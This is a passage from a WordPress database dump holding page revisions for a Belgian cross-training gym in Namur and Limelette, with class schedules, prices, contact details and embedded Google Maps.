rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:29:58', '2013-11-03 09:29:58', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(414, 1, '2013-11-03 09:30:41', '2013-11-03 09:30:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:30:41', '2013-11-03 09:30:41', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(415, 1, '2013-11-03 09:32:35', '2013-11-03 09:32:35', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1 style=\"text-align: center;\">\r\nChoix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:32:35', '2013-11-03 09:32:35', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(416, 1, '2013-11-03 09:33:11', '2013-11-03 09:33:11', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1 style=\"text-align: center;\"></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:33:11', '2013-11-03 09:33:11', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(417, 1, '2013-11-03 09:33:37', '2013-11-03 09:33:37', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 09:33:37', '2013-11-03 09:33:37', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(418, 1, '2013-11-03 09:34:41', '2013-11-03 09:34:41', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact - Namur', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-11-03 09:34:41', '2013-11-03 09:34:41', '', 9, 'http://www2.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(419, 1, '2013-11-03 09:35:16', '2013-11-03 09:35:16', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact - Limelette', '', 'trash', 'closed', 'open', '', 'contact-limelette', '', '', '2013-11-03 10:19:11', '2013-11-03 10:19:11', '', 0, 'http://www2.crosstrainingcenter.be/?page_id=419', 0, 'page', '', 0),
(420, 1, '2013-11-03 09:35:16', '2013-11-03 09:35:16', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact - Limelette', '', 'inherit', 'open', 'open', '', '419-revision-v1', '', '', '2013-11-03 09:35:16', '2013-11-03 09:35:16', '', 419, 'http://www2.crosstrainingcenter.be/419-revision-v1/', 0, 'revision', '', 0),
(421, 1, '2013-11-03 09:35:43', '2013-11-03 09:35:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'publish', 'closed', 'open', '', 'contact-2', '', '', '2013-11-03 10:24:40', '2013-11-03 10:24:40', '', 0, 'http://www2.crosstrainingcenter.be/?page_id=421', 0, 'page', '', 0),
(422, 1, '2013-11-03 09:35:43', '2013-11-03 09:35:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 09:35:43', '2013-11-03 09:35:43', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(424, 1, '2013-11-03 09:49:00', '2013-11-03 09:49:00', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\nLimelette :\r\n\r\n\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\nNamur :\r\n<iframe width=\"300\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\"></iframe><br /><small></small>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 09:49:00', '2013-11-03 09:49:00', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(425, 1, '2013-11-03 09:49:54', '2013-11-03 09:49:54', ' ', '', '', 'publish', 'open', 'open', '', '425', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www2.crosstrainingcenter.be/?p=425', 7, 'nav_menu_item', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(426, 1, '2013-11-03 09:53:18', '2013-11-03 09:53:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">Limelette :</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">Namur :\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small></small></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n<iframe width=\"300\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small></small>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 09:53:18', '2013-11-03 09:53:18', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(427, 1, '2013-11-03 09:54:33', '2013-11-03 09:54:33', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">Limelette :\r\n<iframe width=\"300\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe>\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">Namur :\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n<br /><small></small>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 